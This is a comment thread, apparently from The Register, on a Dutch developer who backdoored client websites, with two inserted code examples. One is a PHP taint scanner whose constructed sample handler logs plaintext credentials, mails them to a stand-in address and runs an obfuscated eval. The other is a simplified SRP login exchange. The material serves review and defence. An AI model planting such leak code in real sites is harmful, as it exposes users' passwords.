Hence the advice not to re-use passwords.
Dodgy Dutch developer built backdoors into thousands of sites
Dutch police are this week warning 20,000 users that their email accounts were hacked after a malicious web developer left backdoors in the sites he built. Cops found the credentials in the un-named 35-year-old man's email account and say he used the stolen personal details to open accounts, convince family members to transfer …
COMMENTS
-
Tuesday 17th January 2017 07:46 GMT A Non e-mouse
[Dutch police] also warn web masters to employ trustworthy web developers
But if you're outsourcing because you don't know how to do something (e.g. you're running a small business, want a website but know nothing about how to build or design one), how are you going to know whether someone is (or is not) trustworthy?
-
Wednesday 18th January 2017 10:52 GMT David Roberts
Trustworthy web developers
And remember, don't get mugged by criminals, and always work smarter not harder.
Plus many other sound bites which shift the blame onto the victim.
Unless, of course, the job description included "actual or potential criminals are encouraged to apply". Are they in fact suggesting that the businesses went out of their way to employ untrustworthy web developers?
Oh, and always remember, kids, stay away from untrustworthy lawyers and accountants. Umm... and stay away from all politicians, both local and national; that one at least is easy.
Sadly noting that the criminal is not a criminal until after the crime has been committed, detected, and then the perpetrator convicted. Criminals aren't always easily detectable.
-
Tuesday 17th January 2017 18:18 GMT Anonymous Coward
Re: Should we build our own cars, planes and airports?
What a neat excuse to buy the cheapest piece of something labelled "a car" or "a plane". One is free to buy a car which has never undergone a crash test. He might even survive a couple of years without crashing that car. Similarly, the Ukrainians recently bought flying drones worth tens of millions only to discover they had been manufactured back in the 80s, and the analogue radio channel had missed the concept of security completely. A corn field can quickly be converted to an airfield. All one needs is a pole, a piece of wood and some paint.
-
Tuesday 17th January 2017 09:50 GMT Anonymous Coward
"But then smart arses such as yourself say not to use the likes of Wordpress and Joomla and leave it to professional web developers. So which is it?"
Well the classic route to starting / growing a business is to formulate a business plan and seek funding if the idea is financially feasible. If you've done your research and have a solid plan you will get funding.
If you're simply punting crap from a drop ship outfit you won't.
Cutting corners and bastardising a blog platform to work as a store front isn't a business plan. Sure, it can be done... but are you really caring about your customers when you do things on the cheap?
Wordpress, Joomla etc online shops are a cancer... a bit like those dodgy "phone unlocking" tat shit holes that spawn on high streets selling low grade Shenzhen specials.
You don't have to get your store front built from scratch but you really should pay the extra dough to deploy a purpose built product rather than try and bend a blog to your will.
Wordpress is badly out of date with its practices. These days there should never be a situation where your front end connects directly to a database. You should have an API in between and your payments should be processed on a box nowhere near your frontend.
It's not expensive to do something like this. I'd usually charge in the region of £1000-£2000 for this, which for a proper business is peanuts. I can see why this price would look unattractive to someone moonlighting as an online vendor attempting to make beer money though.
For a bonafide business (one that is declaring income and trading legitimately), this is barely a cost as it can be written off as an expense against tax.
-
Tuesday 17th January 2017 11:57 GMT Anonymous Coward
Wordpress, Joomla etc online shops are a cancer... a bit like those dodgy "phone unlocking" tat shit holes that spawn on high streets selling low grade Shenzhen specials.
You don't have to get your store front built from scratch but you really should pay the extra dough to deploy a purpose built product rather than try and bend a blog to your will.
Nonsense. Joomla and WP are simply tools, neither good nor bad but they deliver only results if you understand how to use them. I cannot see anyone run a shop on WP, that's simply not what it was designed for (it's OK for a little "public only" website), but it's quite possible on Joomla because it has the fundamental controls in place to make that happen.
The benefit of starting with a standard CMS is that you have fairly well tested fundamentals. To write something that is Internet proof is a long process, and using a CMS that has been through this sort of warfare already means that you can focus on the bit that makes it from "a Joomla/Plone/Drupal/homebrew patchwork/whatever site/toolkit" to YOUR site. It means you don't have to start from the ground up with functionality, DB design, user management, 2FA embedding etc etc - you can focus on making it yours. That's how you get to good functionality without having to start from scratch. It also means you benefit from a fairly large network of people who pick up problems and vulnerabilities instead of sitting on an island with no idea of impending shark attacks (with or without lasers).
In addition, you don't just have an API separation at application level, you also segregate at network level. Anything that takes in data from the public should live on a DMZ and should not retain that on the site but should push this through to another network - money and personal details must be at least 2 walls away from the raw Internet. I know that's not the modern way of working, but when it comes to protecting revenue as well as users I prefer a bit of old school.
It's not expensive to do something like this. I'd usually charge in the region of £1000-£2000 for this, which for a proper business is peanuts.
For a full website handling user details and payment data? Yeah, right. And who will you be selling my users' details to, to make up the shortfall?
-
Wednesday 18th January 2017 12:28 GMT mootpoint
WooCommerce?
You make very good points about "standing on the shoulders of a crowd of giants" when using an established open-source CMS. I will back WordPress against a bespoke e-commerce site any day of the week, simply because it has been stress-tested to f**k in the wild.
I cannot see anyone run a shop on WP, that's simply not what it was designed for (it's OK for a little "public only" website)
WooCommerce extends WordPress to do just that. It does it pretty well, and is now used by 40% of the world's online stores. In other words, WordPress is the most popular e-commerce platform in the world.
-
Saturday 21st January 2017 11:51 GMT Anonymous Coward
Re: My arse is indeed smart...
Such downvotes. Wow.
My point was if you cut corners and do things on the cheap you're more likely to be a victim of this kind of practice.
An Ikea wardrobe is much cheaper than a hand made oak wardrobe made by a carpenter. The handmade one will be higher quality, will last longer and is less prone to structural issues however it costs a metric shit ton more simply because it takes longer to produce and is made of more expensive materials. The carpenter knows you're paying more and will put in the effort to try and win repeat business.
If you purchase a shitty store front off Fiverr et al you probably aren't really building a relationship with your supplier, and it's likely that you won't give him any repeat business; you'll likely move on and find a cheap wanker to support the site and screw him as well, opening the door for another potential thief.
Being a cheapskate is a slippery slope. You'll never acquire the quality you need to show your customers you care.
This is a trap a lot of small businesses fall into and it's a common reason why small businesses fail.
Do it right or don't do it. After all, if you're trying to convince your customers that your products are of a high quality, why would you do it through a low quality site?
If your store front sucks your ability to identify high quality products might suck as well.
-
Tuesday 17th January 2017 14:01 GMT Peter2
I'm not a professional coder, just an ops person. However, I have discovered on a live production website, post handover, that the original developer had put in a few unrequested easter eggs, such as comments viewable in the output HTML source that he was the developer (and contact *dev* via details if you need work done), which was somewhat fair enough.
I was inclined to leave those since the bloke had done a good job up until I noticed that the dev was essentially getting all of the customer details put through the system copied to him. This could quite legitimately have been a development thing as he hadn't got access to our systems and may have just set up a test system identical to our internal system while he was developing the system.
However, equally it could have been deliberate. Obviously, it took no more than a few seconds to delete the lines of code in question but I do wonder how many companies even bother to look through code that's been developed for them.
Trust nobody, check everything. You'll be surprised what you discover on occasion.
-
Tuesday 17th January 2017 07:49 GMT tr1ck5t3r
The public can't even choose trustworthy politicians with the "aided" scrutiny of the media, or have a so called choice in the tech ecosystems on offer to the world, so when clever people make up the rules and then exploit their own rules, is it any wonder some people resort to effectively imitating global "leaders" without the contractual paperwork detailing their actions?
-
Tuesday 17th January 2017 11:19 GMT anonymous boring coward
"It's a small country. Wouldn't normal people talk on the phone or meet before sending dosh?"
Why?
Because they suddenly suspect that an email from their own son or daughter may be a fake?
After 10 years of genuine emails.
And what does talking on the phone have to do with the size of the country?
Or driving for that matter. Do you drive 100 miles to borrow what amounts to the petrol money to get there and back? You ask for money to be withdrawn. Drive there. Get the money. Drive home again. Go to the bank. Deposit it into your own account. Seems stupid, doesn't it?
-
Tuesday 17th January 2017 10:33 GMT Warm Braw
Worse...
There's an update on the Dutch police website linked from the article.
The police had sent out an e-mail to around 20,000 accounts warning that their account details had been compromised. Shortly afterwards, the police started to receive phone calls reporting that this had triggered a wave of fake e-mails purporting to come from the police with the same warning but containing a dodgy "click here"...
It seems no opportunity goes unexploited.
-
Tuesday 17th January 2017 12:00 GMT Anonymous Coward
Re: Worse...
It seems no opportunity goes unexploited.
Yes, but the speed of that attack suggests it must have been prepped by people somehow related to this guy, or even people he worked with. It's too quick a turnaround without some people having had advance notice. Something stinks here, badly.
-
Wednesday 18th January 2017 07:57 GMT Anonymous Coward
Re: Worse...
Having a grasp of the language and having worked there for a couple of years, I think another option is also important to consider: the Dutch police themselves also seem to fall into the "dodgy Dutch", opportunistic category. Taking personal experiences, familiarity with the country's culture (and being a grumpy old fart), I wouldn't be surprised if one of them had seen this opportunity and reacted quickly...
Not that bad? Well... (sorry people, you'll need Google Translate I'm afraid)
https://www.transparency.nl/nieuws/2015/10/corruptie-politie/
http://justitie.eenvandaag.nl/tv-items/71379/_drugs_met_medeweten_politie_land_in_gesmokkeld_
http://www.rtvoost.nl/nieuws/default.aspx?nid=238345
-
Wednesday 18th January 2017 12:30 GMT harmjschoonhoven
@Anonymous Coward who lived in the Netherlands for a few years
Of course corruption exists in a country with Rotterdam, the largest harbour in Europe, where cocaine is smuggled with the assistance of corrupt border police, and Aalsmeer, the largest flower auction in the world, which is infiltrated by the Italian mafia.
But it is unfair to say that the Dutch police force as such is corrupt.
-
Tuesday 17th January 2017 11:37 GMT SVV
What to do?
Try this: code review(s) by independent experts, followed by the software build done by said experts. Hire a company with a good reputation to do this. Keep sole control of authentication credentials (said good company will advise on how to do this easily). Do not store user information in unencrypted form.
Sure it'll cost some money. But nowhere near as much as you might lose if you don't.
Say thank you for my free consultancy advice here.
-
Tuesday 17th January 2017 12:23 GMT Anonymous Coward
If a developer has access to a site's code, this is trivial
There are many people who are (incorrectly) suggesting that by using a platform such as Wordpress or Joomla there is somehow a greater risk of this sort of thing happening.
Absolute nonsense.
Both of those systems are written in PHP. If you have access to the source files for a website, you can easily capture (and log, or do whatever you want with) any form data that the user submits. All that's required here is for the rogue developer to add code to things like registration or login forms, and store it somewhere for use later on. All it requires is access to the POST data, which is trivial in any language.
And before some idiot suggests SSL or encryption - no, that doesn't make any difference here. When the form is submitted to the server all of the information entered is readable within the scripting language. Things like password hashing happen AFTER the data is posted to the server. So if you capture it before, it's readable, in plain text.
Basically if someone has access to the source files of a website where users are inputting information, they can do essentially anything with that data.
This is not specific to PHP and could be done in any server side language.
-
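Peter2's handover story above (customer details silently copied to the developer) and the comment just above it (form data captured in the handler before it is ever hashed) both come down to the same review question: does request data leave the handler through a sink it has no business reaching? The following is an added example by the editor, not code from the thread or from any project: a small forward taint pass over PHP source that flags request superglobals (or variables derived from them) reaching file, mail or network sinks, plus any dynamic-code call. The PHP snippet it scans is constructed for the example; the sink list and the `dev@example.invalid` recipient are assumptions. It is a grep-level aid for the kind of post-handover read-through Peter2 describes, not a full static analyser: a legitimate contact form that mails `$_POST` will be flagged too, and every hit needs a human decision.

```python
import re
from typing import List, NamedTuple

# Functions that move data out of the request handler: to disk, to mail, to the network.
# Assumed list for the example; extend it for the code base under review.
SINKS = ("file_put_contents", "fwrite", "fputs", "error_log", "mail",
         "curl_setopt", "fsockopen", "socket_write")
SUPERGLOBAL = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")
ASSIGNMENT = re.compile(r"^\s*\$(\w+)\s*=(?!=)\s*(.+?);")
SINK_CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\((.*)\)")
DYNAMIC_CODE = re.compile(r"\b(eval|assert|create_function)\s*\(")


class Finding(NamedTuple):
    line: int
    rule: str
    detail: str


def scan_php_source(src: str) -> List[Finding]:
    """Single forward, line-by-line taint pass.

    A variable assigned from a request superglobal, or from an already tainted
    variable, becomes tainted. A tainted value (or a superglobal itself) appearing
    in the arguments of a sink call is reported, as is any dynamic-code call.
    Heuristic: straight-line code only, no function boundaries, no comment parsing.
    """
    findings: List[Finding] = []
    tainted: set = set()

    def mentions_taint(expr: str) -> bool:
        if SUPERGLOBAL.search(expr):
            return True
        if not tainted:
            return False
        pattern = r"\$(" + "|".join(map(re.escape, sorted(tainted))) + r")\b"
        return re.search(pattern, expr) is not None

    for lineno, code in enumerate(src.splitlines(), start=1):
        m = ASSIGNMENT.match(code)
        if m and mentions_taint(m.group(2)):
            tainted.add(m.group(1))
        m = SINK_CALL.search(code)
        if m and mentions_taint(m.group(2)):
            findings.append(Finding(lineno, "request data reaches sink", m.group(1)))
        m = DYNAMIC_CODE.search(code)
        if m:
            findings.append(Finding(lineno, "dynamic code execution", m.group(1)))
    return findings


# Constructed sample of a handed-over login handler with two planted leaks and one
# obfuscated call. The base64 string decodes to the harmless "phpinfo();".
SAMPLE_PHP = """<?php
// constructed sample of a handover review: a login handler with planted leaks
$user = $_POST['username'];
$pass = $_POST['password'];
$record = $user . ':' . $pass;
error_log($record, 3, '/tmp/.cache.log');
mail('dev@example.invalid', 'new signup', $record);
$hash = password_hash($pass, PASSWORD_DEFAULT);
$stmt->execute([$user, $hash]);
eval(base64_decode('cGhwaW5mbygpOw=='));
"""

if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_PHP):
        print(f"line {f.line}: {f.rule} ({f.detail})")
```

Run against the sample it reports lines 6, 7 and 10: the plaintext credentials written to a hidden log, the same record mailed to a hard-coded address, and the obfuscated `eval`. Line 8 is correctly silent, since `password_hash` is where the data is supposed to go; the point of the comment above is that the leaks on lines 6 and 7 happen before that hashing and so see the password in clear.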
Tuesday 17th January 2017 19:12 GMT cbars
Re: If a developer has access to a site's code, this is trivial
Password hashing done server side, after submission...
Ok. But couldn't/shouldn't you hash it in JS using your algorithm of choice on the client side, then submit the hash. I mean, that is what I understood to be the way to go.
I've been wrong before
-
Wednesday 18th January 2017 09:51 GMT Anonymous Coward
Re: If a developer has access to a site's code, this is trivial
"But couldn't/shouldn't you hash it in JS using your algorithm of choice on the client side"
No. You should never rely on anything client side for security. Anything client side can be manipulated - or disabled (e.g. turn off javascript in a browser) - by the end user. Any security measures must be done server side.
Any type of "validation" you see being done in Javascript is purely for cosmetic purposes. If you disable js in your browser and submit a form that's only being validated with Javascript you can submit anything to the server - and if no checking is done there - the consequences can be severe.
-
Wednesday 5th April 2017 12:24 GMT cbars
Re: If a developer has access to a site's code, this is trivial
So it's three months later - but I thought I'd leave this here on the off chance someone sees it:
http://www.ietf.org/rfc/rfc2945.txt
My original comment was about password security, while not relevant to the security of a website's source code (hence the admission of flippancy), the above is an interesting protocol I had not come across before - and validates my original statement.
-
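The protocol cbars links to (RFC 2945, SRP) is the middle ground the earlier exchange in this sub-thread was circling: the client does do the password computation, but the server does not trust the client's word for it, it verifies a proof against a stored verifier, and the plaintext password never crosses the wire or reaches the server's request handler at all. The following is an added example by the editor of one complete SRP exchange with both sides' messages, not code from the thread or from any project. Assumptions: the 1024-bit group and generator 2 are the RFC 5054 Appendix A parameters; SHA-256 is used where RFC 2945 specifies SHA-1; the session-key proof M is simplified to H(A, B, K) rather than the RFC's full form; usernames and passwords are constructed.

```python
import hashlib
import hmac
import os

# 1024-bit safe-prime group from RFC 5054, Appendix A (generator 2), used as the SRP group.
N_HEX = ("EEAF0AB9ADB38DD69C33F80AFA8FC5E86072618775FF3C0B9EA2314C9C256576"
         "D674DF7496EA81D3383B4813D692C6E0E0D5D8E250B98BE48E495C1D6089DAD1"
         "5DC7D7B46154D6B6CE8EF4AD69B15D4982559B297BCF1885C529F566660E57EC"
         "68EDBC3C05726CC02FD4CBF4976EAA9AFD5138FE8376435B9FC61D2FC0EB06E3")
N = int(N_HEX, 16)
G = 2
N_LEN = (N.bit_length() + 7) // 8


def to_bytes(n: int) -> bytes:
    """Fixed-width big-endian encoding so hashes of group elements are unambiguous."""
    return n.to_bytes(N_LEN, "big")


def h_int(*parts: bytes) -> int:
    """Hash a concatenation to an integer (SHA-256 here; RFC 2945 itself specifies SHA-1)."""
    return int.from_bytes(hashlib.sha256(b"".join(parts)).digest(), "big")


def private_key_x(salt: bytes, username: str, password: str) -> int:
    """RFC 2945: x = SHA(s | SHA(U | ":" | p)). Computed only on the client."""
    inner = hashlib.sha256(f"{username}:{password}".encode()).digest()
    return h_int(salt, inner)


def enrol(username: str, password: str):
    """Client-side enrolment. The server stores (salt, verifier) and never sees the password."""
    salt = os.urandom(16)
    verifier = pow(G, private_key_x(salt, username, password), N)
    return salt, verifier


def scrambler_u(B: int) -> int:
    """RFC 2945: u is the first 32 bits of the hash of the server's public value B."""
    return h_int(to_bytes(B)) >> (256 - 32)


def server_challenge(verifier: int):
    """Server: pick b, send B = v + g^b (the RFC 2945 form, without the SRP-6 k factor)."""
    b = int.from_bytes(os.urandom(32), "big")
    B = (verifier + pow(G, b, N)) % N
    return b, B


def client_session(username, password, salt, a, A, B):
    """Client: S = (B - g^x)^(a + u*x) mod N; returns session key K and proof M."""
    if B % N == 0:
        raise ValueError("server sent B == 0 mod N; abort")
    x = private_key_x(salt, username, password)
    u = scrambler_u(B)
    S = pow((B - pow(G, x, N)) % N, a + u * x, N)
    K = hashlib.sha256(to_bytes(S)).digest()
    # Proof of K, simplified from RFC 2945's M = H(H(N) xor H(g), H(U), s, A, B, K).
    M = hashlib.sha256(to_bytes(A) + to_bytes(B) + K).digest()
    return K, M


def server_verify(verifier, b, A, B, M):
    """Server: S = (A * v^u)^b mod N; accept only if the client's proof matches."""
    if A % N == 0:
        return False, None  # RFC 2945 requires rejecting A == 0 mod N
    u = scrambler_u(B)
    S = pow((A * pow(verifier, u, N)) % N, b, N)
    K = hashlib.sha256(to_bytes(S)).digest()
    expected = hashlib.sha256(to_bytes(A) + to_bytes(B) + K).digest()
    return hmac.compare_digest(expected, M), K


def authenticate(username: str, attempt: str, salt: bytes, verifier: int) -> bool:
    """One full exchange; True only when both sides derive the same key from the right password."""
    a = int.from_bytes(os.urandom(32), "big")
    A = pow(G, a, N)                                             # client -> server: U, A
    b, B = server_challenge(verifier)                            # server -> client: s, B
    K_client, M = client_session(username, attempt, salt, a, A, B)  # client -> server: M
    ok, K_server = server_verify(verifier, b, A, B, M)
    return ok and K_client == K_server


if __name__ == "__main__":
    s, v = enrol("alice", "correct horse battery staple")
    print("correct password accepted:", authenticate("alice", "correct horse battery staple", s, v))
    print("wrong password accepted:  ", authenticate("alice", "Tr0ub4dor&3", s, v))
```

Note what the server-side code has available: the salt, the verifier, its own ephemeral b, and the two public values. None of those let a handler that has been tampered with recover the password, which is the difference between this and the client-side hash the reply above objected to; the server still does its own cryptographic check, so nothing here depends on trusting the browser's validation.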